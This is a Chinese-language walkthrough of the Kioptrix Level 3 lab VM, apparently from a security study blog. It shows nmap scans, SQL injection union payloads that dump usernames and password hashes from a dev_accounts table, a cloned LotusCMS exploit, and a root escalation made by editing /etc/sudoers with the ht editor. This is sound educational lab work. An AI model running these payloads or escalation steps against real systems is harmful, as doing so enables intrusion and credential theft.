声明!
文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!
一、靶机搭建
点击扫描虚拟机
data:image/s3,"s3://crabby-images/69b7d/69b7d4715add2dee9521cf45dabadd78d560cfaa" alt=""
选择靶机使在文件夹即可
data:image/s3,"s3://crabby-images/fc363/fc363d9ece5b0c83c9a85c9d68812f0f8a182cd0" alt=""
二、信息收集
前言
信息收集阶段,因为这里是靶机,所以不需要做什么,但是实际渗透测试中,大家一定要学会正确的隐藏自己的个人信息
扫完ip后即可得到以下信息
kali:192.168.108.130
目标ip:192.168.108.137
扫ip
nmap -sn 192.168.108.0/24
排除已知的,这个则是靶机ip
data:image/s3,"s3://crabby-images/01feb/01febb07d995de24d1639e9fc99381ee3dc435e9" alt=""
扫端口和服务信息
nmap -p 1-65535 192.168.108.137
nmap -sV 192.168.108.137
data:image/s3,"s3://crabby-images/0ac2f/0ac2fd129dc3eb563e30db74e5bd2a5ce2ef952c" alt=""
可用信息
OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
指纹探测
nmap 192.168.108.137 -p 22,80 -sV -sC -O --version-all
得到以下信息
data:image/s3,"s3://crabby-images/78eba/78ebab8f0102a56f613d66f202c0117a11e8a59b" alt=""
操作系统信息:
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
三、踩点或预探测
1.访问web服务
有以下页面
data:image/s3,"s3://crabby-images/68db2/68db20df17629952edd277e92e3eca66b3fbe2ac" alt=""
有登录框,可能存在漏洞,尝试弱口令无果
data:image/s3,"s3://crabby-images/c0be8/c0be83adba7128195d1c82a9e8908a76584d6513" alt=""
有个页面不可正常访问,可能是DNS缓存的问题,去设置一下
2. 设置域名解析
1. windows环境下
首先如果浏览器访问过该网站,需要找到浏览器缓存,这里我使用的火狐浏览器,点击管理数据
data:image/s3,"s3://crabby-images/90632/9063228b4067dd268534a32cd6626f34d1302ad1" alt=""
找到刚才的网站,删除缓存
data:image/s3,"s3://crabby-images/68df4/68df4e351efebb8a33b781193c4f711d1ef25bdd" alt=""
在下面的目录下,选择host属性
C:\Windows\System32\drivers\etc
设置权限
data:image/s3,"s3://crabby-images/eb026/eb026ddcd3df3c492ebd52420f3c3ad11afee819" alt=""
设置之后在记事本编辑,设置如下,靶机ip 域名
data:image/s3,"s3://crabby-images/265a2/265a268f912f1aee59751c6c4626c953d4cb9bf8" alt=""
然后刷新缓存即可
data:image/s3,"s3://crabby-images/2ce56/2ce56f95c4fcca52282bf8b272bb9c5628ce51de" alt=""
2. linu环境下设置
sudo vim /ets/hosts
输入以下保存即可
靶机ip kioptrix3.com
全部完成之后这个页面即可正常访问
data:image/s3,"s3://crabby-images/a2698/a269893d56654a2e79c9eea2c9c27ec25e770bf3" alt=""
3. 找出可利用点
sql注入
逐个点击之后发现此处存在id参数
data:image/s3,"s3://crabby-images/7b204/7b204b432d545dcc47d530544bce765b59352b13" alt=""
尝试利用
data:image/s3,"s3://crabby-images/90d7f/90d7f4f00cb620a2033bff738af22d8d40e00dbe" alt=""
测试id=2 ;id=1' ,发现报错,应该存在sql注入漏洞
data:image/s3,"s3://crabby-images/a4b03/a4b0326812b25e7c5467b156b9382c1d0fb870e8" alt=""
LotusCMS漏洞
searchsploit LotusCMS
第一个需要利用msfconsle,这里我们用第二个
data:image/s3,"s3://crabby-images/1c484/1c4843e5dd671503886c0086a54a1d45eb78813c" alt=""
github上搜索
data:image/s3,"s3://crabby-images/532fa/532fa652b61948602f695cbe454b18522f9bf64b" alt=""
复制以下链接
https://github.com/Hood3dRob1n/LotusCMS-Exploit.git
执行
git clone https://github.com/Hood3dRob1n/LotusCMS-Exploit.git/
拉取成功
data:image/s3,"s3://crabby-images/53d04/53d049528dff1b95db006c8fc8a84499d697883f" alt=""
data:image/s3,"s3://crabby-images/f5c65/f5c65ccad5530c8f087821580075e90e764aa176" alt=""
四、采取攻击措施
数据库爆破常用参数
data:image/s3,"s3://crabby-images/06f2d/06f2da1bd63f55e6beb0df5b54759f50582a5dff" alt=""
爆列数
?id=1 order by 7--
data:image/s3,"s3://crabby-images/e3928/e39288cfbe957f1bf642429d32df232f9495cb8f" alt=""
爆行数
?id=2 union select 1,2,3,4,5,6--
data:image/s3,"s3://crabby-images/705a8/705a8ac8b1d2ea6e4ecc069cc7d4bd18b69ecff1" alt=""
爆数据库
?id=2 union select 1,database(),3,4,5,6--
得到数据库名: gallery
爆表
?id=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.columns where table_schema=database()--
结果
data:image/s3,"s3://crabby-images/848f1/848f1fc9e16fa873bd30294032393740a49993e1" alt=""
爆元素
?id=2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database() and table_name='dev_accounts'--
逐个查询表中元素,在第一个表中看到以下信息
data:image/s3,"s3://crabby-images/5a1b6/5a1b65c115ba04cbaa7141f84f8cce44c3ea74c3" alt=""
查看此内容
?id=2 union select 1,group_concat(username),group_concat(password),4,5,6 from dev_accounts--
加密的MD5值:
用户名:dreg,loneferret
密码:0d3eccfb887aabd50f243b3f155c0f8,5badcaf789d3d1d09794d8f021f40f0e
data:image/s3,"s3://crabby-images/8e5cd/8e5cd2afcf4bca45437648a76a45edead1c27dd8" alt=""
用户名:dreg,loneferret
密码:Mast3r,starwars
登录
有两中方法,一种利用shell,一种直接在靶机登录
登录成功
data:image/s3,"s3://crabby-images/79883/798833e680170b496dbc2421ebdcabf7473d82e6" alt=""
五、提权
靶机
data:image/s3,"s3://crabby-images/a3bcb/a3bcbd5a5037de7a2703c1f3578dbd25ee0a134c" alt=""
试试另外一个账户,输入exit退出登录
data:image/s3,"s3://crabby-images/898e3/898e3dfa227186da2a6aaf2ce4229a8b32a644d8" alt=""
可以看到有checksec.sh ,CompanyPolicy.README这两个文件
做到这一步就没有什么头绪了,换另一种方式也没用,这个时候需要删除虚拟机,重新导入
cat CompanyPolicy.README
sudo ht
data:image/s3,"s3://crabby-images/65b7b/65b7bb6c293268d65a2904d230a66c544178d041" alt=""
重新导入后执行sudo ht 结果如下,按F3 搜索,并输入etc/sudoers
data:image/s3,"s3://crabby-images/3049d/3049de05f2caa6d90f1e556b895c813c0f8ccdf8" alt=""
此处添加/bin/bash,按F10保存并退出
data:image/s3,"s3://crabby-images/ef5d4/ef5d488c10662327de154b8a4a26364cabcf40c9" alt=""
提权成功
data:image/s3,"s3://crabby-images/d3ddd/d3dddb891887b422de71333a80f3579fafcb4f2d" alt=""
kali执行shell连接
data:image/s3,"s3://crabby-images/a890b/a890bbb4731f58908f2d0a367c201c21fe3def23" alt=""
看到需要加密算法,这里我利用了gpt找到了解决办法,实际考试是不允许的,所以平时学习遇到的新一定要熟练掌握
data:image/s3,"s3://crabby-images/29de6/29de640f102b27b93d1c0cb42b9478913fe7dc2c" alt=""
利用代码:
ssh -o HostKeyAlgorithms=+ssh-rsa loneferret@192.168.108.137
成功登录
data:image/s3,"s3://crabby-images/a8d5c/a8d5ce80157a9ff63a10feb766d450ad605a1b33" alt=""
sudo ht
发现需要添加环境变量
data:image/s3,"s3://crabby-images/38f83/38f8383e40be278acd3a6cc6779d6d294758efb5" alt=""
添加环境变量
export TERM=xterm
再次执行 sudo ht,后面的步骤则和之前一样